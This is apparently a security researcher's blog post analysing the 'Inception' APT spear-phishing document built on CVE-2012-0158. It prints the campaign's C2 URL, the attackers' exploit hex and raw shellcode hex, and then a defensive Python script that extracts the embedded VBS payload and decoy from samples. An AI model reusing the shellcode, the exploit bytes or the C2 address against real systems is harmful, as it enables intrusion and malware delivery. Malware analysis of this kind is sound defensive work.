View RSS Feed

w@rri0r@bh@y

Apt inception

Rating: 3 votes, 2.67 average.
Greet: "Vinnu", "nightrover","bond"

In the month of Dec 2014 BlueCoat released report on APT campaign named ad "Inception". The spear phishing mail was sent with attachment with various names we analyzed attachment which was named as "Car for sale.doc". The Attachment was exploit (CVE-2012-0158) with embed VBS and decoy file themed an advertisement of a used car for sale that purportedly originated from Michael Hahne employee at the German Embassy.
For writing this blog our main moto was to automate Extraction of large payload and decoy file used in APT Inception so that it can save time of researchers to extract payloads and possibly new varient of the malware.
Decoy File
------------
Name:  1.JPG
Views: 160
Size:  39.2 KB

Payload
---------
VBE File -> VBS File -> Dll File -> C2

C2 Info
--------
Code:
http://webdav.cloudme.com/chloe7400/CloudDrive/
The sample we used can trigger vulnerability in both on MS office 2007 and MS office 2010.
The following is the code attackers used
Code:
60016327FE6E6027454B414A4F45474A624A5F27303C58274241EB0C5F2858276EE55D277DFB5C274241EB04A2266027454A414A484A4E4A4A474D4281C41C010000FFE4AABC6127D41158276C0B5E27690D5E27100104000000010000000100F2C95C2724F3C0CC00BDEF9312EA95AC34A30DB700800000512B6027F11A5827B05154EC377F612749EC59274BC249C312313DE61CA07EC38CED582746EA592787946EAD923813C8F3C95C27F3C95C27F3C95C27AABC6127000A632759526227F2C95C2729565ADADC587CCF04574592000C0000E38C6127000A6327D354602728BC6027F11A582767EFC8DB12CB9FE4AC9D4BCDF2C95C2780000000512B6027DEB15C2766BB262666BB26264B4B414A4748434F4742434A434B42414149434F42414E4F494A4142434F484F434A4B4848434343484A4E41424A4E43464B424842484848474746424A4742424F4B464B4F434B4A4F464848484641434A4E4E4E484F48474241424E484B484748484848
Attackers also used Following code instead of the Nop Slide.
Code:
4B4B414A4748434F4742434A434B42414149434F42414E4F494A4142434F484F434A4B4848434343484A4E41424A4E43464B424842484848474746424A4742424F4B464B4F434B4A4F464848484641434A4E4E4E484F48474241424E484B484748484848
We used following sample for creating extraction code:
Md5 : 4624da84cae0f8b689169e24be8f7410
Exploit - CVE-2012-0158

Shell Code used in this sample was:
Code:
6081ec001000008bec33c9648b35300000008b760c8b761c8b5e088b46088b7e208b3666394f1875f2e8050000009090909090895d04894508ff750868ad9b7ddfe8bf000000894520ff75086854caaf91e8af000000894524ff750868ac08da76e89f000000894528ff7508681665fa10e88f00000089452c6a045e5456ff552089859400000083f8ff750683c60456ebe983f80076f56a006a0068e657000056ff55288d85900000006a00506a088d859c0000005056ff552c81bd9c0000005054405475c689b5980000006a406800100000ffb5a00000006a00ff55248985a40000008d9d900000006a0053ffb5a000000050ffb598000000ff552c8b9da4000000ffe3558bec578b7d088b5d0c568b733c8b74337803f3568b762003f333c94941ad03c35633f60fbe1038d67408c1ce0d03f240ebf13bfe5e75e55a8beb8b5a2403dd668b0c4b8b5a1c03dd8b048b03c55e5f5dc2080
After analysing sample we came with the Python Extractor which can be used for extracting Malware & Decoy from the attachment/Doc exploit used in this Campaign:

Code:
import os, shutil,binascii


scan = os.getcwd() + "\\scan\\"
processed_file = os.getcwd() + "\\comp\\"
nocomp = os.getcwd() + "\\nocomp\\"
output = os.getcwd() + "\\output\\"

try:
    os.mkdir(processed_file)
    os.mkdir(nocomp)
    os.mkdir(output)
except:
    pass

samples = os.listdir(scan)

def mov_nocomp():
 try:
     shutil.move(os.path.join(scan,sample),os.path.join(nocomp,sample))
 except:
       pass

def mov_processed_file():
 try:
     shutil.move(os.path.join(scan,sample),os.path.join(processed_file,sample))
 except:
       pass


def decryption(file_size,file_decrypt):
        comp = ""
        xor_key = ""
        a = file_size-1
        for i in range(file_size-1,0,-1):
                xor_key = a % 0x100
                comp += chr(ord(file_decrypt[i]) ^ xor_key)
                a = a - 1
        comp1 = ""
        a1 = len(comp)-1
        for i in range (0,len(comp)-1,1):
            comp1 += comp[a1]
            a1 = a1 - 1
        return comp1

def vbs_swap(data):
    compl = ""
    a = 0
    b = 1
    comp = ""
    for i in range (0,0x200,2):
        compl += data[b]+data[a]
        a = a + 2
        b = b + 2
    comp = compl + data[0x200:]
    return comp

for sample in samples:
        file = open(scan+sample,"rb")
        fl = file.read()
        file.close()
        
        if fl[:4] == "{\\rt":
            found = fl.find("VPdPD")
            print "Processing_APT_Inception_" + sample
            file_decrypt = ""
            if found > -1:
                file_decrypt = fl[found+0x1d:]
                file_size = len(file_decrypt)
                comp = decryption(file_size,file_decrypt)
                data = binascii.unhexlify('D0CF11')
                doc_file = comp.find(data)
                vbs_file = comp[8:doc_file]
                vbs_data = vbs_swap(vbs_file)
                doc_file1 = comp[doc_file:]
                vbs_ex = open(output+sample+".vbs","wb")
                vbs_ex.write(vbs_data)
                vbs_ex.close()
                doc_ex = open(output+sample+".doc","wb")
                doc_ex.write(doc_file1)
                doc_ex.close()
                mov_processed_file()
            else:
                mov_nocomp()
        else:
            mov_nocomp()

Updated 03-23-2015 at 05:59 PM by 41.w4r10r

Tags: None Add / Edit Tags
Categories
Uncategorized

Comments

Trackbacks

Total Trackbacks 0
Trackback URL: